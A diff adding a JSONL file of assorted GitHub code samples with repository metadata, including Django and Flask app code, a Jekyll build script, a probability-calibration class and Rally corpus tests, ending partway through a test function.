diff --git "a/3222.jsonl" "b/3222.jsonl" new file mode 100644--- /dev/null +++ "b/3222.jsonl" @@ -0,0 +1,462 @@ +{"seq_id":"12963939169","text":"from datetime import timedelta\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom ...models import Session\n\n\nclass Command(BaseCommand):\n help = \"Removes session older than 6 hours\"\n\n def handle(self, *args, **options):\n threshold = timezone.now() - timedelta(hours=6)\n\n sessions = Session.objects.filter(last_activity__lt=threshold)\n sessions_deleted = len(sessions)\n sessions.delete()\n\n if sessions_deleted > 1:\n self.stdout.write(self.style.SUCCESS(f\"Removed {sessions_deleted} sessions\"))\n elif sessions_deleted is 1:\n self.stdout.write(self.style.SUCCESS(f\"Removed {sessions_deleted} session\"))\n else:\n self.stdout.write(self.style.WARNING(f\"No sessions to remove\"))\n","repo_name":"LotteSuz/intseconds30","sub_path":"api/management/commands/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"74799000080","text":"#Programa que lea el archivo romeo.txt linea a linea y en cada una busque si las palabras coinciden con las que tiene y si no añadirlas. Al final \n#sacar la lista de palabras ordenada\narchivo_romeo = open('romeo.txt')\n\npalabras_unicas = [] #Crear una lista de palabras unicas\nfor linea in archivo_romeo: #Ir recorriendo las lineas en el archivo\n linea.rstrip() #Eliminar los espacios de la derecha\n palabras = linea.split() #Convertir cada linea en una lista de palabras\n for palabra in palabras: #Ir recorriendo las palabras de la lista\n if palabra not in palabras_unicas: #Si la palabra no está repetida guardar en la lista de palabras unicas añadiendola\n palabras_unicas.append(palabra)\n\npalabras_unicas.sort() #Ordenar por orden alfabetico la lista de palabras unicas e imprimir\nprint(palabras_unicas)","repo_name":"AlvaroNavarroFandos/Estructuras-de-datos","sub_path":"Listas/list_palabras_unicas.py","file_name":"list_palabras_unicas.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33690015341","text":"from exceptions.resource_not_found import ResourceNotFound\nfrom Models.classroom import Classroom\nfrom repos.classroom_repo import ClassroomRepo\nfrom dbconnection.dataconnection import connection\n\n\ndef _build_classroom(record):\n if record:\n return Classroom(classroom_id=record[0], title=record[1], price=float(record[2]), start_date=record[3],\n grade=(record[4] if record[4] else 0))\n else:\n return None\n\n\nclass ClassroomRepoImpl(ClassroomRepo):\n\n def create_classroom(self, classroom):\n sql = \"INSERT INTO classrooms VALUES (DEFAULT,%s,%s,DEFAULT,NULL) RETURNING *\"\n\n cursor = connection.cursor()\n cursor.execute(sql, [classroom.title, classroom.price])\n\n connection.commit()\n record = cursor.fetchone()\n\n return _build_classroom(record)\n\n def get_classroom(self, classroom_id):\n\n sql = \"SELECT * FROM classrooms WHERE c_id = %s\"\n cursor = connection.cursor()\n\n cursor.execute(sql, [classroom_id])\n\n record = cursor.fetchone()\n\n if record:\n return _build_classroom(record)\n else:\n raise ResourceNotFound(f\"Classroom with id: {classroom_id} - Not Found\")\n\n def all_classrooms(self):\n sql = \"SELECT * FROM classrooms\"\n cursor = connection.cursor()\n cursor.execute(sql)\n\n records = 
cursor.fetchall()\n\n classroom_list = [_build_classroom(record) for record in records]\n\n return classroom_list\n\n def update_classroom(self, change):\n sql = \"UPDATE classrooms SET title=%s, price=%s, start_date=%s, course_id=%s WHERE c_id = %s \" \\\n \"RETURNING *\"\n\n cursor = connection.cursor()\n cursor.execute(sql, [change.title, change.price,\n change.start_date, (change.grade if change.grade > 0 else None), change.classroom_id])\n\n connection.commit()\n record = cursor.fetchone()\n\n return _build_classroom(record)\n\n def delete_classroom(self, classroom_id):\n sql = \"DELETE FROM classrooms WHERE c_id = %s\"\n\n cursor = connection.cursor()\n cursor.execute(sql, [classroom_id])\n connection.commit()\n\n\ndef _test():\n cr = ClassroomRepoImpl()\n classroom = cr.get_classroom(1)\n print(classroom)\n\n print(cr.all_classrooms())\n\n classroom = Classroom(title=\"Math 101\", price=505)\n classroom = cr.create_classroom(classroom)\n print(cr.all_classrooms())\n print(\"-----------\")\n classroom.title = \"Math\"\n classroom.price += 1\n classroom = cr.update_classroom(classroom)\n\n print(classroom)\n\n print(\"---SUCCESSFULLY DELETED---\")\n cr.delete_classroom(classroom.classroom_id)\n print(cr.all_classrooms())\n\n\nif __name__ == '__main__':\n _test()\n","repo_name":"Gabito4/Project1","sub_path":"repos/classroom_repo_impl.py","file_name":"classroom_repo_impl.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15351486322","text":"from __future__ import unicode_literals\n\n\nfrom django import VERSION\n\nif VERSION >= (2, 1):\n from django.contrib.auth.views import LoginView\n login = LoginView.as_view()\nelse:\n from django.contrib.auth.views import login\n\nif VERSION < (1, 8): # pragma: nocover\n from django.conf.urls import url, include, patterns\n nsurlpatters = patterns(\n '',\n url(r'^login2$', 'django.contrib.auth.views.login', name='login2_url'),\n )\n\n urlpatterns = patterns(\n '',\n url(r'^login$', 'django.contrib.auth.views.login', name='login_url'),\n url(r'^login/(?P[-_\\w]+)$', 'django.contrib.auth.views.login',\n name='login_args_url'),\n url(r'^login/user/(?P\\S+)$',\n 'django.contrib.auth.views.login',\n name='login_kwargs_url'),\n (r'^ns/', include(nsurlpatters, namespace='ns')),\n )\nelif VERSION < (2, 0):\n from django.conf.urls import url, include\n nsurlpatters = [\n url(r'^login2$', login, name='login2_url'),\n ]\n\n urlpatterns = [\n url(r'^login$', login, name='login_url'),\n url(r'^login/(?P[-_\\w]+)$', login, name='login_args_url'),\n url(r'^login/user/(?P\\S+)$', login, name='login_kwargs_url'),\n url(r'^ns/', include(nsurlpatters, namespace='ns')),\n ]\nelse:\n from django.urls import include, path, re_path\n nsurlpatters = [\n path('login2', login, name='login2_url'),\n ]\n\n urlpatterns = [\n path('login', login, name='login_url'),\n re_path(r'^login/(?P[-_\\w]+)$', login, name='login_args_url'),\n re_path(r'^login/user/(?P\\S+)$', login,\n name='login_kwargs_url'),\n path('ns/', include((nsurlpatters, 'ns'), namespace='ns')),\n ]\n","repo_name":"prymitive/bootstrap-breadcrumbs","sub_path":"tests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"3"} +{"seq_id":"18470024932","text":"import calendar, json, urllib2, os, foursquare, datetime\nfrom flask import render_template, request, session, url_for, redirect\nfrom flask_login 
import login_required, current_user\nfrom app import app\nfrom app import db\nfrom app import forms, datastore, api\nfrom api import foursquare\nfrom forms import EventCreateForm, EventPreferenceForm, EventJoinForm\nfrom datastore import Event, User, attendance, Preference\nfrom sqlalchemy import desc\nfrom passlib.hash import sha256_crypt\nfrom datetime import date\nfrom geopy.geocoders import Nominatim\n\ngeolocator = Nominatim()\n\ndef is_attendee_or_host(user, event):\n if user == event.host or user in event.attendees :\n return True\n else :\n return False\n\ndef is_host(user, event): \n if user == event.host : \n return True\n else : \n return False\n\n@app.route('/')\n@app.route('/index')\ndef index():\n if current_user.is_anonymous() : \n return render_template('homepage.html')\n else :\n return redirect('/dashboard')\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n# Dashboard: displays the events the user is either hosting or attending\n@app.route('/dashboard')\n@login_required\ndef dashboard(): \n events_hosting = Event.query.order_by(desc(Event.start_time)).filter(Event.host.has(id=current_user.id)).all()\n events_attending = Event.query.order_by(desc(Event.start_time)).filter(Event.attendees.any(id=current_user.id)).all()\n return render_template('dashboard.html', events_hosting=events_hosting, events_attending=events_attending)\n\n# View Event: displays basic information about an event to host and attendees only\n@app.route('/events/view/<event_id>')\n@login_required\ndef events_view(event_id):\n event = Event.query.get(event_id)\n preferences = Preference.query.filter(Preference.event.has(id=event_id))\n num_preferences = preferences.count()\n # check if this person is an attendee or host\n user_is_host = is_host(current_user, event)\n if is_attendee_or_host(current_user, event) :\n return render_template('events_view.html', event=event, num_preferences=num_preferences, preferences=preferences, is_host=user_is_host, current_user=current_user)\n else :\n return render_template('events_view.html', error='you dunbelong')\n \n# Create Event: allows user to create an event as a host\n@app.route('/events/create', methods=['GET', 'POST'])\n@login_required\ndef events_create():\n form = EventCreateForm(request.form)\n # if form was submitted and is valid\n if request.method == 'POST' and form.validate():\n password = sha256_crypt.encrypt(form.password.data) if form.password.data else None\n new_event = Event(name=form.name.data, host=current_user, password=password)\n db.session.add(new_event)\n db.session.commit()\n return render_template('events_create.html', method='post')\n # if form was submitted but failed validation\n elif request.method == 'POST':\n return render_template('events_create.html', method='post', error=form.errors)\n else :\n return render_template('events_create.html', form=form, method='get')\n\n# Delete Event: allows host to delete an event\n@app.route('/events/delete/<event_id>', methods=['POST'])\n@login_required\ndef events_delete(event_id): \n preferences = Preference.query.filter(Preference.event.has(id=event_id))\n event = Event.query.filter(Event.id == event_id).first()\n if current_user == event.host : \n db.session.delete(event)\n for preference in preferences :\n db.session.delete(preference)\n db.session.commit()\n return redirect(url_for('dashboard'))\n\n# Join Event: allows user to join an event *** TO ADD: PASSWORD TO JOIN ***\n@app.route('/events/join/<event_id>', methods=['GET', 'POST'])\n@login_required\ndef events_join(event_id):\n form = EventJoinForm(request.form)\n event = Event.query.filter(Event.id == event_id).first()\n # check if current user is already attendee or host\n # if not, add them\n if current_user not in event.attendees and current_user != event.host :\n if request.method == 'POST' and form.validate() :\n if event.password :\n if sha256_crypt.verify(form.password.data, event.password) :\n event.attendees.append(current_user)\n db.session.commit()\n return render_template('events_join.html', event=event, response='you have joined!')\n else :\n return render_template('events_join.html', response='wrong pass yo!')\n else :\n event.attendees.append(current_user)\n db.session.commit()\n return render_template('events_join.html', event=event, response='you have joined!')\n else : \n return render_template('events_join.html', form=form, event=event, event_id=event_id, method='get')\n else :\n return redirect(url_for('events_view', event_id=event_id))\n\n# Leave Event: allows user to leave an event\n@app.route('/events/leave/<event_id>')\n@login_required\ndef events_leave(event_id):\n preference = Preference.query.filter(Preference.event.has(id=event_id)).filter(Preference.attendee.has(id=current_user.id)).first()\n event = Event.query.filter(Event.id == event_id).first()\n if current_user in event.attendees :\n event.attendees.remove(current_user)\n db.session.delete(preference)\n db.session.commit()\n return render_template('events_leave.html', response='you have been removed!')\n else :\n return render_template('events_leave.html', response='you not even in it yo')\n\n# Event Preferences: allows user to add their preferences for a specific event\n@app.route('/events/preferences/<event_id>', methods=['GET', 'POST'])\n@login_required\ndef events_preferences(event_id):\n today = date.today()\n form = EventPreferenceForm(request.form)\n event = Event.query.get(event_id)\n\n # check if user is either a host or attendee\n if is_attendee_or_host(current_user, event) :\n # check if a permission already exists\n if Preference.query.filter(Preference.attendee.has(id=current_user.id) & Preference.event.has(id=event_id)).count() != 0 : \n preference = Preference.query.filter(Preference.attendee.has(id=current_user.id) & Preference.event.has(id=event_id)).first()\n available_times = json.loads(preference.availability)\n return render_template('events_preferences.html', response='preference already created')\n else :\n # check to see if the form was submitted\n if request.method == 'POST' and form.validate():\n new_preference = Preference(attendee_id=current_user.id, event_id=event_id, availability=form.availability.data, willing_to_spend=int(form.willing_to_spend.data), location=form.location.data)\n db.session.add(new_preference)\n db.session.commit()\n return render_template('events_preferences.html', response='preference added')\n else :\n return render_template('events_preferences.html', form=form, event_id=event_id, today=today, calendar=calendar)\n else :\n return render_template('events_preferences.html', error='you dont have permission')\n\n# Decide on location and time \n@app.route('/events/decide/<event_id>', methods=['POST'])\n@login_required\ndef events_decide(event_id):\n location_name = request.form.get('location_name')\n location_address = request.form.get('location_address')\n date = request.form.get('date')\n start_time = request.form.get('start_time')\n end_time = request.form.get('end_time')\n preferences = Preference.query.filter(Preference.event.has(id=event_id))\n event = Event.query.filter(Event.id == event_id).first()\n if current_user == event.host : \n if location_name and location_address : \n event.location_name = location_name\n event.location_address = location_address\n if date and start_time and end_time :\n event.date = datetime.datetime.strptime(date, \"%m-%d-%Y\").date()\n event.start_time = datetime.datetime.strptime(start_time, '%H:%M:%S').time()\n event.end_time = datetime.datetime.strptime(end_time, '%H:%M:%S').time()\n db.session.commit()\n return redirect(url_for('dashboard'))\n\n# Analyze Preferences\n@app.route('/events/generate/<event_id>', methods=['GET', 'POST'])\n@login_required\ndef events_generate(event_id):\n event = Event.query.get(event_id)\n preferences = Preference.query.filter(Preference.event.has(id=event_id))\n if preferences.count() > 1:\n possible_dates = {}\n possible_locations = []\n possible_willing_to_spend = []\n \n # Gather preferences and place them into lists/dictionaries we can parse through later\n for preference in preferences :\n # For each preference, load its available dates\n available_dates = json.loads(preference.availability)\n # Add available dates to a dictionary and record the number of people that date works for\n for available_date in available_dates : \n if available_date['date'] in possible_dates :\n possible_dates[available_date['date']]['attendance'] += 1\n if available_date['start_time'] > possible_dates[available_date['date']]['start_time'] :\n possible_dates[available_date['date']]['start_time'] = available_date['start_time']\n if available_date['end_time'] < possible_dates[available_date['date']]['end_time'] :\n possible_dates[available_date['date']]['end_time'] = available_date['end_time']\n else :\n possible_dates[available_date['date']] = {}\n possible_dates[available_date['date']]['attendance'] = 1\n possible_dates[available_date['date']]['start_time'] = available_date['start_time']\n possible_dates[available_date['date']]['end_time'] = available_date['end_time']\n # Get rid of buggy possible dates, like start times after end times\n true_possible_dates = {}\n for possible_date in possible_dates :\n if possible_dates[possible_date]['start_time'] < possible_dates[possible_date]['end_time'] :\n true_possible_dates[possible_date] = possible_dates[possible_date]\n\n possible_dates = true_possible_dates\n possible_willing_to_spend.append(preference.willing_to_spend)\n possible_locations.append(preference.location)\n\n # Get optimal date, first one\n # optimal_date = possible_dates.keys()[0];\n # optimal_date_object = possible_dates[optimal_date]\n # optimal_start_time = optimal_date_object['start_time']\n # optimal_end_time = optimal_date_object['end_time']\n\n # Get optimal willing_to_spend: averages how much everyone is willing to spend\n optimal_willing_to_spend = sum(possible_willing_to_spend)/len(possible_willing_to_spend)\n \n # Get optimal location: average latitude and longitude, return its address\n possible_locations_lat = []\n possible_locations_lng = []\n for possible_location in possible_locations : \n location = geolocator.geocode(possible_location, timeout=20)\n possible_locations_lat.append(location.latitude)\n possible_locations_lng.append(location.longitude)\n optimal_location_latlng = str(sum(possible_locations_lat)/len(possible_locations_lat)) + ', ' + str(sum(possible_locations_lng)/len(possible_locations_lng))\n optimal_location_full = geolocator.reverse(optimal_location_latlng, timeout=25).raw['address']\n if 'postcode' in optimal_location_full.keys() : \n optimal_location = optimal_location_full['postcode']\n elif 'city' in 
optimal_location_full.keys() : \n optimal_location = optimal_location_full['city']\n else : \n optimal_location = optimal_location_full['county']\n\n possible_venues = foursquare.venues.explore(params={'query': '', 'near': optimal_location, 'limit': '5', 'sortByDistance': '1', 'time': 'any', 'price': optimal_willing_to_spend})['groups'][0]['items']\n return render_template('events_generate.html', possible_venues=possible_venues, possible_times=possible_dates, event=event)\n else : \n return 'no preferences submitted'","repo_name":"cindyyu/shindig","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37881253140","text":"#!/usr/bin/env python3\n'''\nSimple Jekyll site manage script.\n'''\nimport os\nimport sys\nimport time\nimport datetime\nimport signal\nimport argparse\nimport subprocess\nfrom os import system as run\nfrom subprocess import Popen\nimport http.server\nimport socketserver\n\nTIMEZONE = '+0800'\n\nPOST_TEMPLATE =\\\n'''---\nlayout: post\ntitle: {}\ndate: {}\ncategory:\nsummary:\ntypora-root-url: ../\ntypora-copy-images-to: ../media\n---'''\n\ndef open_with_app(filepath):\n '''https://stackoverflow.com/questions/434597/open-document-with-default-application-in-python'''\n if sys.platform.startswith('darwin'):\n subprocess.call(('open', filepath))\n elif os.name == 'nt':\n os.startfile(filepath)\n elif os.name == 'posix':\n subprocess.call(('xdg-open', filepath))\n\ndef create_post(title: str):\n filename = title.replace(' ', '_').lower()\n now = datetime.datetime.now()\n source = POST_TEMPLATE.format(filename, now.strftime('%Y-%m-%d %H:%M:%S '+TIMEZONE))\n filename = now.strftime('%Y-%m-%d-') + filename + '.md'\n path = os.path.join('_posts', filename)\n if not os.path.exists(path):\n with open(path, mode='w', encoding='utf-8') as new:\n new.write(source)\n else:\n print('File {} already exists!'.format(filename))\n open_with_app(path)\n\n\ndef build():\n run('JEKYLL_ENV=production bundle exec jekyll build')\n run('npm run webpack')\n run('sass ./_sass/main.sass ./assets/style.css')\n run('cp -r ./node_modules/han-css/font/ ./assets/fonts/')\n\ndef serve():\n try:\n Popen('npm run webpack -- -w', shell=True)\n Popen('sass --watch ./_sass/main.sass:./assets/style.css', shell=True)\n run('cp -r ./node_modules/han-css/font/ ./assets/fonts/')\n Popen(\"bundle exec jekyll serve\", shell=True).wait()\n finally:\n os.killpg(os.getpid(), signal.SIGTERM)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(dest='command')\n\n build_parser = subparsers.add_parser('build', help='Build site')\n deploy_parser = subparsers.add_parser('serve', help='Develop server')\n post_parser = subparsers.add_parser('post', help='Create new post.')\n post_parser.add_argument('title')\n\n args = parser.parse_args()\n if args.command == 'post':\n create_post(args.title)\n elif args.command == 'build':\n build()\n elif args.command == 'serve':\n serve()\n\nif __name__ == '__main__':\n main()\n","repo_name":"tioover/ioover-blog","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"38301936868","text":"import numpy as np\nimport pandas as pd\nimport plotnine as p9\nfrom typing import Iterable, Self, Optional\nfrom sklearn.base import BaseEstimator\nfrom sklearn.isotonic import 
IsotonicRegression\nfrom cuppa.components.passthrough import PassthroughRegression\nfrom cuppa.misc.utils import max_col\nfrom cuppa.misc.plotting import PlotnineFigExporter\nfrom cuppa.logger import LoggerMixin\n\n\nclass RollingAvgCalibration(BaseEstimator, LoggerMixin):\n \"\"\"\n Modified probability calibration approach based on isotonic regression\n\n Given:\n - an array of probabilities\n - an array of booleans, indicating whether a sample belongs to a cancer type\n\n Perform the following steps:\n - Sort both arrays by the probabilities\n - Slide a window along the boolean array and take the mean of the values in the window at each step\n - Fit an isotonic regression, with the x-values being the probabilities and y-values being the sliding window means\n\n This approach results in more granular y-values, which improves the isotonic regression fit\n\n Parameters\n ----------\n min_true_samples: int\n Minimum number of samples of the target cancer type required to perform the\n calibration. Cancer types with fewer samples than this value will simply have the uncalibrated probabilities\n returned\n\n window_size: int or 'variable'\n Size of the window (number of samples)\n\n kernel: 'uniform' or 'gaussian'\n 'uniform': mean of the sliding window. 'gaussian': weighted mean where the center has more weight than the\n edges\n\n edge_weight: float\n Only when kernel='gaussian'. Higher values place more weight on the edges\n\n n_true_exponent: float\n Only when window_size='variable'. Automatic calculation of the window size based on the formula:\n int(round(n_true_samples ** n_true_exponent))\n\n Higher values result in wider windows\n\n save_coords: bool\n Save the probabilities and the rolling average values within each `calibrator` object in\n `self.calibrators`\n\n bypass: bool\n If True, raw probabilities will be returned upon prediction time (i.e. 
calibration will be bypassed)\n\n \"\"\"\n\n def __init__(\n self,\n min_true_samples: int = None,\n window_size: int | str = 50,\n kernel: str = \"gaussian\",\n edge_weight: float = 0.16,\n n_true_exponent: float = 0.7,\n save_coords: bool = False,\n bypass: bool = False\n ):\n self.min_true_samples = min_true_samples\n self.window_size = window_size\n self.edge_weight = edge_weight\n self.n_true_exponent = n_true_exponent\n self.kernel = kernel\n self.save_coords = save_coords\n self.bypass = bypass\n\n ## Kernel ================================\n def _auto_calc_window_size(self, n_true_samples: int, n_true_exponent: float):\n return int(round(n_true_samples ** n_true_exponent))\n\n def _gaussian_kernel(self, window_size=50, edge_weight=0.16):\n\n def _normal_dist(x, mean, sd):\n ## Norm dist formula from\n ## https://www.askpython.com/python/normal-distribution\n return (np.pi * sd) * np.exp(-0.5 * ((x - mean) / sd) ** 2)\n\n weights = _normal_dist(\n x = np.array(range(1, window_size + 1)),\n mean = window_size / 2,\n sd = window_size * edge_weight ## Higher edge_weight values put more weight on indexes near the edge\n )\n weights = weights / np.sum(weights)\n\n return weights\n\n def _get_kernel_func(self, kernel, window_size: int = None, edge_weight: float = None):\n if kernel == \"uniform\":\n func = np.mean\n\n elif kernel == \"gaussian\":\n window_weights = self._gaussian_kernel(window_size=window_size, edge_weight=edge_weight)\n func = lambda x: np.sum(x * window_weights)\n\n else:\n self.logger.error(\"`kernel` must be 'gaussian' or 'uniform'\")\n raise ValueError\n\n return func\n\n ## Main ================================\n def _fit_one_calibrator(\n self,\n probs: Iterable[float],\n bools: Iterable[bool],\n min_true_samples: int = None,\n window_size: str | int = \"variable\",\n n_true_exponent: float = 0.7,\n edge_weight: float = 0.16,\n kernel: str = \"gaussian\",\n save_coords: bool = False\n ) -> IsotonicRegression | PassthroughRegression:\n\n ## Checks --------------------------------\n probs = np.array(probs)\n bools = np.array(bools)\n n_true_samples = sum(bools)\n\n if probs.ndim != 1:\n self.logger.error(\"`probs` must be an 1d array\")\n raise TypeError\n\n if bools.ndim != 1 or bools.dtype != \"bool\":\n self.logger.error(\"`bool` must be an 1d boolean array\")\n raise TypeError\n\n if edge_weight <= 0:\n self.logger.error(\"`edge_weight` must be >0\")\n raise ValueError\n\n if not isinstance(window_size, str) and window_size <= 0:\n self.logger.error(\"`window_size` must be >0\")\n raise ValueError\n\n ## Prepare kernel --------------------------------\n if window_size == \"variable\":\n window_size = self._auto_calc_window_size(n_true_samples=n_true_samples, n_true_exponent=n_true_exponent)\n\n kernel_func = self._get_kernel_func(kernel=kernel, window_size=window_size, edge_weight=edge_weight)\n\n ## Main --------------------------------\n ## Sort data by prob\n coords = pd.DataFrame(dict(bool=bools, prob=probs), index=None)\n coords.sort_values(\"prob\", ascending=False, inplace=True)\n\n ## Ignore calibration if there are not enough samples\n if min_true_samples is not None and n_true_samples < min_true_samples:\n calibrator = PassthroughRegression()\n\n else:\n ## Add padding to bool array to handle kernel going beyond edges\n bool_padded = np.concatenate([\n np.ones(window_size),\n coords[\"bool\"],\n np.zeros(window_size)\n ])\n\n ## Rolling averages to smooth out bool array\n avgs = pd.Series(bool_padded).rolling(window=window_size, 
center=True).apply(kernel_func)\n\n ## Discard padding\n n_samples = len(bools)\n avgs = avgs[window_size:(window_size + n_samples)]\n\n coords[\"avg\"] = avgs.values\n\n calibrator = IsotonicRegression(out_of_bounds=\"clip\")\n calibrator.fit(coords[\"prob\"], coords[\"avg\"])\n\n ## Store training x,y coords for debugging\n if save_coords:\n calibrator.coords = coords\n\n return calibrator\n\n def fit(self, X: pd.DataFrame, y: pd.Series) -> Self:\n \"\"\"\n\n Parameters\n ----------\n X: pandas DataFrame\n Probabilities for each sample (row) and cancer type (columns)\n\n y: pandas Series of type str or Categorical\n Cancer type labels for each sample\n\n Returns\n -------\n self\n fitted estimator\n \"\"\"\n if not isinstance(X, pd.DataFrame):\n self.logger.error(\"`X` must be a pandas dataframe\")\n raise ValueError\n\n calibrators = {}\n for class_i in np.unique(y):\n calibrator_i = self._fit_one_calibrator(\n X[class_i],\n y==class_i,\n min_true_samples = self.min_true_samples,\n window_size = self.window_size,\n edge_weight = self.edge_weight,\n n_true_exponent = self.n_true_exponent,\n kernel = self.kernel,\n save_coords = self.save_coords\n )\n calibrators[class_i] = calibrator_i\n\n self.calibrators = calibrators\n\n return self\n\n def predict_proba(self, X: pd.DataFrame, normalize: bool = True) -> pd.DataFrame:\n\n if self.bypass or X.shape[0] == 0:\n return X\n\n if not isinstance(X, pd.DataFrame):\n self.logger.error(\"`X` must be a pandas dataframe\")\n raise ValueError\n\n probs_cal = {}\n for class_name in X.columns:\n calibrator = self.calibrators[class_name]\n probs_cal[class_name] = calibrator.predict(X[class_name])\n\n probs_cal = pd.DataFrame(probs_cal, index=X.index)\n\n if normalize:\n ## Scale probs from 0 to 1\n probs_cal = probs_cal.T / np.sum(probs_cal, axis=1)\n probs_cal = probs_cal.T\n\n return probs_cal\n\n def predict(self, X: pd.DataFrame, y: pd.Series = None) -> pd.Series:\n return max_col(self.predict_proba(X))\n\n def transform(self, X: pd.DataFrame, y: pd.Series = None) -> pd.DataFrame:\n return self.predict_proba(X)\n\n def fit_transform(self, X: pd.DataFrame, y: pd.Series) -> pd.DataFrame:\n return self.fit(X, y).transform(X)\n\n def set_output(self, transform: str = None) -> Self:\n return self\n\n # Calibration curves ================================\n def get_cal_curves(self, x_resolution=500, long_format=True) -> pd.DataFrame:\n\n ## Get y values\n x_values = np.linspace(0, 1, x_resolution + 1)\n\n cal_curves = {\n class_name: calibrator.predict(x_values)\n for class_name, calibrator in self.calibrators.items()\n }\n\n ## Wide format with x values as first col\n cal_curves = pd.DataFrame(cal_curves)\n cal_curves[\"x\"] = x_values\n\n if long_format:\n cal_curves = cal_curves.melt(id_vars=\"x\", var_name=\"class\", value_name=\"y\")\n cal_curves = cal_curves[['class', 'x', 'y']]\n\n return cal_curves\n\n def plot_cal_curves(\n self,\n path: Optional[str] = None,\n width: int | float = 20,\n height: int | float = 15,\n dpi: int = 300,\n facet_ncol: Optional[int] = None\n ):\n\n cal_curves = self.get_cal_curves()\n\n has_groups = \"group\" in cal_curves.columns\n\n fig = (\n p9.ggplot(cal_curves, p9.aes(x=\"x\", y=\"y\"))\n + p9.facet_wrap(\"class\", ncol=facet_ncol)\n + (p9.geom_path(p9.aes(color=\"group\", group=\"group\")) if has_groups else p9.geom_path())\n + p9.labs(x=\"Input probability\", y=\"Calibrated probability\")\n + p9.theme_bw()\n + p9.theme(panel_grid_minor=p9.element_blank())\n ).draw(show=False, return_ggplot=False)\n\n ## Export\n 
fig_exporter = PlotnineFigExporter(width=width, height=height, dpi=dpi)\n fig_exporter.export(fig, path)\n","repo_name":"hartwigmedical/hmftools","sub_path":"cuppa/src/main/python/pycuppa/cuppa/components/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":10610,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"3"} +{"seq_id":"8803076683","text":"# for saving figures\nEXT = '.png'\n# EXT = '.eps'\n\n# calcsfh output file naming schemes\nOUTEXT = '.out'\nSCRNEXT = '.scrn'\nPHOTEXT = '.match'\nFAKEEXT = '.matchfake'\nPARAMEXT = '.param'\n\nmatch_base = '$HOME/match2.6/'\ncalcsfh = \"$HOME/match2.6/bin/calcsfh\"\ncalcsfh_flag = \"-PARSEC -dT=0.01 -dZ=0.05 -ssp -full -dAvy=0.0\"\n# calcsfh_flag = \"-MIST -dT=0.01 -dZ=0.01 -ssp -full -dAvy=0.0\"\n","repo_name":"philrosenfield/match","sub_path":"scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"31929829816","text":"from esrally.track import DocumentCorpus, Documents, Track\nfrom shared.utils.corpus import (\n bounds,\n calculate_corpus_counts,\n calculate_integration_ratios,\n convert_to_gib,\n)\nfrom shared.utils.track import generate_track_id\nfrom tests.parameter_sources import StaticTrack\n\n\ndef test_generate_track_id():\n corpus = DocumentCorpus(\n name=\"system-logs\",\n documents=[\n Documents(\n \"bulk\",\n document_file=\"./data/logs-system.syslog-default.json\",\n number_of_documents=19637,\n uncompressed_size_in_bytes=26128253,\n target_index=\"logs-system.syslog-default\",\n )\n ],\n )\n track = Track(\"test_track\", corpora=[corpus])\n assert generate_track_id(track) == generate_track_id(track)\n\n\ndef test_corpus_count_calculation():\n counts = calculate_corpus_counts(\n {\n \"system-logs\": {\n \"avg_doc_size\": 1024,\n \"raw_json_ratio\": 10.0,\n \"avg_doc_size_with_meta\": 1024,\n \"avg_message_size\": 1024 / 10.0,\n },\n \"agent-logs\": {\n \"avg_doc_size\": 1024,\n \"raw_json_ratio\": 20.0,\n \"avg_doc_size_with_meta\": 1024,\n \"avg_message_size\": 1024 / 20.0,\n },\n },\n {\"system-logs\": 0.5, \"agent-logs\": 0.5},\n 10,\n max_generation_size_gb=10,\n )\n assert counts[\"system-logs\"] == 3495254\n assert counts[\"agent-logs\"] == 6990507\n\n\ndef test_corpus_count_calculation_unlimited():\n counts = calculate_corpus_counts(\n {\n \"system-logs\": {\n \"avg_doc_size\": 1024,\n \"raw_json_ratio\": 10.0,\n \"avg_doc_size_with_meta\": 1024,\n \"avg_message_size\": 1024 / 10.0,\n },\n \"agent-logs\": {\n \"avg_doc_size\": 1024,\n \"raw_json_ratio\": 20.0,\n \"avg_doc_size_with_meta\": 1024,\n \"avg_message_size\": 1024 / 20.0,\n },\n },\n {\"system-logs\": 0.5, \"agent-logs\": 0.5},\n 10,\n )\n assert counts[\"system-logs\"] == 52428800\n assert counts[\"agent-logs\"] == 104857600\n\n\ndef test_corpus_ratio_calculation():\n ratios = calculate_integration_ratios({\"system-logs\": 75, \"agent-logs\": 25})\n assert ratios[\"system-logs\"] == 0.75\n assert ratios[\"agent-logs\"] == 0.25\n\n\ndef test_bounds_calculation():\n offset, docs = bounds(10, 0, 2)\n assert offset == 0\n assert docs == 5\n offset, docs = bounds(10, 1, 2)\n assert offset == 5\n assert docs == 5\n offset, docs = bounds(10, 0, 3)\n assert offset == 0\n assert docs == 3\n offset, docs = bounds(10, 1, 3)\n assert offset == 3\n assert docs == 3\n offset, docs = bounds(10, 2, 3)\n assert offset == 6\n assert docs == 4\n\n\ndef 
